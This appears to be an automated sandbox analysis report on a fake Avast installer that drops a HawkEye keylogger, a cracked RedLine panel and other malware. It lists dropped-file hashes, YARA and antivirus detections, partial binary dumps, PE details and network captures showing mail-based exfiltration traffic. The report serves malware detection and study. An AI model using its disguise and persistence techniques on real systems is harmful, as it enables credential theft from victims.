                                                                                        Preview: L..................F.@.. ....gP.....K,U.....0......4.......................G....P.O. .:i.....+00.../C:\...................V.1.....7S{y..Windows.@......L..rS............................c.k.W.i.n.d.o.w.s.....Z.1.....7Spy..System32..B......L..rS.............................I..S.y.s.t.e.m.3.2.....h.2.4...rS.. .USER32~1.EXE..L......rS..rS......>}........................u.s.e.r.3.2.d.l.l...e.x.e.......P...............-.......O...........m.{.....C:\Windows\System32\user32dll.exe..9.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.u.s.e.r.3.2.d.l.l...e.x.e...C.:.\.W.i.n.d.o.w.s.\.e.x.p.l.o.r.e.r...e.x.e.........%SystemRoot%\explorer.exe...........................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.e.x.p.l.o.r.e.r...e.x.e..................................
                                                                                        C:\Users\user\AppData\Roaming\RedLine.exe
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):77824
                                                                                        Entropy (8bit):4.7460869785957795
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:la5jbMQXU4hH8yvmYRVFykX84Jw08W6ArYVTsr7KRbLfC:o5jJXUQCk/raXbO
                                                                                        MD5:098F7F40BACA320377ECA83FBF87F534
                                                                                        SHA1:1C14C269465D850550EB7DC955E5CA5A0FA2CEC2
                                                                                        SHA-256:42B18977DAC9E72BBC4B9FA1A61085CD8A96CD99E59421196AA8AA0D8D4CF225
                                                                                        SHA-512:B6270744603D1D842E42827E561C85A130DAB6859FEFAC2F255B8911175D2394E0D8A48B5F676EC7C4CF4342CD088CB3A99C7379F17171CF5944A07E11D5D577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 89%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kxa............................~.... ........@.. ....................................@.................................,...O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`.......H........6..0.......L....5..p...........................................&.(......*..*..(......*..s.........s.........s.........s.........s..........*....0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0............{....(...+}.....{.....+..*.0..7.........{........,..+%..........,.r...ps....z...|....o...+..*..0.................,.........o....-..+......9....~..............,3~.........(...
                                                                                        C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        Process:C:\Users\user\AppData\Local\Temp\Keylogger.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):533504
                                                                                        Entropy (8bit):6.503682543410338
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:huxqV1dNbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9Y:RdNQtqB5urTIoYWBQk1E+VF9mOx9oiL
                                                                                        MD5:C4E4A84909D8FF8DD222B8252365985D
                                                                                        SHA1:6EEF0588DD038F5FF2A73C70ADD36C1659495322
                                                                                        SHA-256:14ADE1921A7BFE68DBFD21BFEB14BBEF6B89ED0DD15E9FBFA79A985EB42959F2
                                                                                        SHA-512:24CB338CAE623B7532AC04EE25CC41A8B319D6F80324F3A411796633969604925A857353655BE39D7E2254465F6830E4D6F0A04265C34AB042939EB6AD5D3672
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!5|a.....................4........... ........@.. ....................................@.....................................K.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}.................X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                        C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                        Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):533504
                                                                                        Entropy (8bit):6.503682543410338
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:huxqV1dNbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9Y:RdNQtqB5urTIoYWBQk1E+VF9mOx9oiL
                                                                                        MD5:C4E4A84909D8FF8DD222B8252365985D
                                                                                        SHA1:6EEF0588DD038F5FF2A73C70ADD36C1659495322
                                                                                        SHA-256:14ADE1921A7BFE68DBFD21BFEB14BBEF6B89ED0DD15E9FBFA79A985EB42959F2
                                                                                        SHA-512:24CB338CAE623B7532AC04EE25CC41A8B319D6F80324F3A411796633969604925A857353655BE39D7E2254465F6830E4D6F0A04265C34AB042939EB6AD5D3672
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Arnim Rupp
                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!5|a.....................4........... ........@.. ....................................@.....................................K.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}.................X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                        C:\Users\user\AppData\Roaming\pid.txt
                                                                                        Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):2.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:C7:C7
                                                                                        MD5:81BC798A42A7CE40810BF523F24DEEE1
                                                                                        SHA1:2EB42F6F5AA9B4FEE8A34200D60567A93CBC72CE
                                                                                        SHA-256:1CC4C660D80F3452841386109DEEAFFE554F4FD47A5409F614BD6C1B53C78C65
                                                                                        SHA-512:ED786180AC7491F2C13A7E6453FD329FC53659F4F454BFB704B12DA7617BB94461D78C12FF7A1CDD0255815EA189684344EFABD86304146C98A9650257C89B9C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: 5248
                                                                                        C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                        Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):49
                                                                                        Entropy (8bit):4.441568140944513
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:oNWXp5cViEaKC59KYr4a:oNWXp+NaZ534a
                                                                                        MD5:6078085422A31D60FCEB24D4FA24B6E8
                                                                                        SHA1:0CD056478F3D877B3D44C7B439485B1ACFD78F5A
                                                                                        SHA-256:9113E6728CEB1F460E3CEAB19852A31602CD77A92E7B861802FE339FD5CFD837
                                                                                        SHA-512:22CE5D96BB25519CB14F27BDB44D7FAEDC6D5C8B8F81A1F972EA638BF9731D8793C98359D7C9476D50AF46346E0964E82F5B0B2F8B1B6763B078D2B045FB2EA1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                        C:\Windows\SysWOW64\user32dll.exe
                                                                                        Process:C:\Users\user\AppData\Local\Temp\ViRuS.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46132
                                                                                        Entropy (8bit):5.26909765114528
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:dmiiqTfk2AMRGwlFgOrjsI5Z52ulLGM88VI02foeZSgTi10U:dpTfDbGwlF9nsI5Z52ulLGM88VI02foT
                                                                                        MD5:D0F09063EA6922ACBFC734145FA48203
                                                                                        SHA1:48253D06D8D053A4433B679E56270553D4F7FD66
                                                                                        SHA-256:71B96AF827245221A3D2AA884636F20BF41627DFC079A02D5DE58CD58C9A0111
                                                                                        SHA-512:E1DAC2DD5A8F05ED26C817CADEDD3A8B0124A15D257BDAB434E88BE2300E64BA8270A0DCFA5990CA8A81D36E274CC77BE843A31E6CC10A074B7DFE4B24C71A3F
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                        • Antivirus: ReversingLabs, Detection: 93%
                                                                                        Reputation:unknown
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............si..si..si..ld..si.Rich.si.........................PE..L...j..G.................`... ......<........p....@..................................~.......................................l..(...........................................................................(... ....................................text....].......`.................. ..`.data........p......................@....rsrc................p..............@..@..:@............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1572864
                                                                                        Entropy (8bit):4.2756168590544
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:hfnlScmddpKhnku1M5h0NXtX3ZQL1xQHwrzzmMB+aUn+frp0BrBN1:5nlScmddpKhnkuxH
                                                                                        MD5:6F6341035C32C699CCB490E03BA51DA2
                                                                                        SHA1:AB3534EB33DD4685111AFDEB644B8ACA5098DDA8
                                                                                        SHA-256:D44A0D22E8F8E5723BE787028A956EEFCC7BCCC5960B60FB9606097C2B1BEBDD
                                                                                        SHA-512:928BE07358B6277D052DCF2FFA8C1571A1F2DA2AE55A09FCA231F768B57811B6BBB1AB3204D3D447341D778AE8428C9E4948499404B52606A2C5DD11D4F0B509
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.g&..................................................................................................................................................................................................................................................................................................................................................."G........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):36864
                                                                                        Entropy (8bit):4.204425478661901
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+h8dCkpMwqharRCXw5ftx1zJ4XVFFZ7FBqXceq5QMVyi6aC4LX+uzuRDTm:EfaBfy2CRRT4
                                                                                        MD5:CE8E365BA34D14C0A14087AEB24CFCC4
                                                                                        SHA1:58EE19555F73CCE80A027EC17DA6D9A4D16586E6
                                                                                        SHA-256:5AC5EC00FEF748A4078CBFD61991BBA6A688FA8E349BB8DB1731147E997B4C11
                                                                                        SHA-512:9CF04D31A6D46ED9D84A9FE4BC5C6D3D6EC793D653B96964DD56173FDD59EC44CDA3254500DC9F5A1557C821BBE7C34030C05F98D6DDAE2FB63F150004D8CD79
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.g&..................................................................................................................................................................................................................................................................................................................................................."GHvLE........Y...........vT.....L&u.GY........... ....... .......P.......0................... ..hbin................p.\..,..........nk,..g&..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..g&......... ........................... .......Z.......................Root........lf......Root....nk ..g&......................}.............. ...............*...............DeviceCensus.......................vk..................
                                                                                        \Device\ConDrv
                                                                                        Process:C:\Windows\System32\netsh.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):313
                                                                                        Entropy (8bit):4.971939296804078
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                                        MD5:689E2126A85BF55121488295EE068FA1
                                                                                        SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                                        SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                                        SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview: ..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.7405121102619034
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • VXD Driver (31/22) 0.00%
                                                                                        File name:Hpdyv8oO3j.exe
                                                                                        File size:1634464
                                                                                        MD5:dffaf08a25150b38c19210c180862aeb
                                                                                        SHA1:a28b135b64a08d5ed30621aac5c3e955d4d090fb
                                                                                        SHA256:8fdbfbf55033187c6a4d3cd7d42394cd56cbd3b5a9dc905e72aef2886172be36
                                                                                        SHA512:140b3431fb93d4af25df7da68b9dea8eec93e721f40831c12a0a2acb0e9fd1bda23a9d9665b5d18a39a2424bf5b57a2118dab705bfaabd0ce759e3fe0786abe7
                                                                                        SSDEEP:24576:Db9maw2TucZ2p7oPGutOb82k3QfRq661wRISp5iygGVBi9NTFABQHFidcQKwY:VgZWfu79UOq61IYLOZUQHifKwY
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Q.....................X............... ....@..........................`.............................................

                                                                                        File Icon

                                                                                        Icon Hash:70f0b2e8c8cce071

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x401ae1
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x51BC99EC [Sat Jun 15 16:44:28 2013 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:d5d9d937853db8b666bd4b525813d7bd

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        call 00007F0FFCECBE51h
                                                                                        mov dword ptr [0040300Bh], eax
                                                                                        push 00000000h
                                                                                        call 00007F0FFCECBE5Dh
                                                                                        mov dword ptr [00403013h], eax
                                                                                        call 00007F0FFCECBE5Fh
                                                                                        mov dword ptr [00403C70h], eax
                                                                                        push 0000000Ah
                                                                                        push dword ptr [0040300Bh]
                                                                                        push 00000000h
                                                                                        push dword ptr [00403013h]
                                                                                        call 00007F0FFCECB2DFh
                                                                                        push 00000000h
                                                                                        call 00007F0FFCECBE08h
                                                                                        int3
                                                                                        jmp dword ptr [0040207Ch]
                                                                                        jmp dword ptr [00402008h]
                                                                                        jmp dword ptr [0040200Ch]
                                                                                        jmp dword ptr [00402010h]
                                                                                        jmp dword ptr [00402014h]
                                                                                        jmp dword ptr [00402018h]
                                                                                        jmp dword ptr [0040201Ch]
                                                                                        jmp dword ptr [00402020h]
                                                                                        jmp dword ptr [00402024h]
                                                                                        jmp dword ptr [00402028h]
                                                                                        jmp dword ptr [0040202Ch]
                                                                                        jmp dword ptr [00402030h]
                                                                                        jmp dword ptr [00402034h]
                                                                                        jmp dword ptr [00402038h]
                                                                                        jmp dword ptr [0040203Ch]
                                                                                        jmp dword ptr [00402040h]
                                                                                        jmp dword ptr [00402044h]
                                                                                        jmp dword ptr [00402048h]
                                                                                        jmp dword ptr [0040204Ch]
                                                                                        jmp dword ptr [00402050h]
                                                                                        jmp dword ptr [00402054h]
                                                                                        jmp dword ptr [00402058h]
                                                                                        jmp dword ptr [00402000h]

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x20bc0x50.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x174bf0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000xbc.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000xc260xe00False0.479352678571data5.14633256781IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x20000x4c00x600False0.405598958333data4.21235747943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x30000xd6f00x600False0.169270833333data1.7255508052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x110000x174bf00x174c00False0.979429310236data7.95139965452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountry
                                                                                        RT_ICON0x112b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                                        RT_RCDATA0x154d80x7f63edata
                                                                                        RT_RCDATA0x94b180x60fa0data
                                                                                        RT_RCDATA0xf5ab80xabbdata
                                                                                        RT_RCDATA0xf65740xcbccdata
                                                                                        RT_RCDATA0x1031400x7c202data
                                                                                        RT_RCDATA0x17f3440x7ddata
                                                                                        RT_RCDATA0x17f3c40xbf9data
                                                                                        RT_RCDATA0x17ffc00x5659data
                                                                                        RT_RCDATA0x18561c0x2c8data
                                                                                        RT_GROUP_ICON0x1858e40x14data
                                                                                        RT_VERSION0x1858f80x2f8data

                                                                                        Imports

                                                                                        DLLImport
                                                                                        shlwapi.dllPathFindFileNameA
                                                                                        kernel32.dllLockResource, lstrlenA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, GlobalFree, HeapAlloc, HeapFree, LoadLibraryA, LoadResource, lstrcpynA, RtlMoveMemory, SetFileAttributesA, SizeofResource, WriteFile, lstrcatA, lstrcpyA
                                                                                        user32.dllCreateWindowExA, DefWindowProcA, DispatchMessageA, GetMessageA, LoadCursorA, LoadIconA, MessageBoxA, PostQuitMessage, RegisterClassExA, SendMessageA, ShowWindow, TranslateMessage, UpdateWindow

                                                                                        Version Infos

                                                                                        DescriptionData
                                                                                        LegalCopyrightCopyright (c) 2021 AVAST Software
                                                                                        InternalNamemicrostub
                                                                                        FileVersion2.1.67.0
                                                                                        CompanyNameAVAST Software
                                                                                        ProductNameAvast
                                                                                        Edition1
                                                                                        ProductVersion2.1.67.0
                                                                                        FileDescriptionAvast Installer
                                                                                        OriginalFilenamemicrostub.exe
                                                                                        Translation0x0409 0x04b0

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        11/18/21-10:14:13.549647TCP1201ATTACK-RESPONSES 403 Forbidden8049752104.16.155.36192.168.2.3
                                                                                        11/18/21-10:15:00.459104TCP1201ATTACK-RESPONSES 403 Forbidden8049792104.16.154.36192.168.2.3

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 18, 2021 10:14:13.506644011 CET4975280192.168.2.3104.16.155.36
                                                                                        Nov 18, 2021 10:14:13.524010897 CET8049752104.16.155.36192.168.2.3
                                                                                        Nov 18, 2021 10:14:13.524190903 CET4975280192.168.2.3104.16.155.36
                                                                                        Nov 18, 2021 10:14:13.524677992 CET4975280192.168.2.3104.16.155.36
                                                                                        Nov 18, 2021 10:14:13.541861057 CET8049752104.16.155.36192.168.2.3
                                                                                        Nov 18, 2021 10:14:13.549647093 CET8049752104.16.155.36192.168.2.3
                                                                                        Nov 18, 2021 10:14:13.592021942 CET4975280192.168.2.3104.16.155.36
                                                                                        Nov 18, 2021 10:14:15.660120010 CET4975280192.168.2.3104.16.155.36
                                                                                        Nov 18, 2021 10:14:15.678446054 CET8049752104.16.155.36192.168.2.3
                                                                                        Nov 18, 2021 10:14:15.678519964 CET4975280192.168.2.3104.16.155.36
                                                                                        Nov 18, 2021 10:14:15.984420061 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:16.012470007 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:16.012586117 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:16.057013035 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:16.073266983 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:16.100999117 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:16.104752064 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:16.153516054 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:16.181858063 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:16.232880116 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.379117966 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.407233953 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.407269955 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.407293081 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.407310009 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.407367945 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.420160055 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.447946072 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.498857021 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.835191011 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.864593029 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.884593010 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.912350893 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:17.912878036 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:17.945096970 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:18.192670107 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:18.248687029 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:18.601368904 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:18.629040956 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:18.629096985 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:18.629952908 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:18.657972097 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:18.701881886 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:20.534931898 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:20.568020105 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:20.635399103 CET497546542192.168.2.382.202.167.226
                                                                                        Nov 18, 2021 10:14:20.693188906 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:20.713485956 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:20.713654995 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:20.722357988 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:20.735387087 CET49753587192.168.2.3173.194.79.109
                                                                                        Nov 18, 2021 10:14:20.741095066 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:20.741125107 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:20.749790907 CET58749753173.194.79.109192.168.2.3
                                                                                        Nov 18, 2021 10:14:20.762877941 CET58749753173.194.79.109192.168.2.3
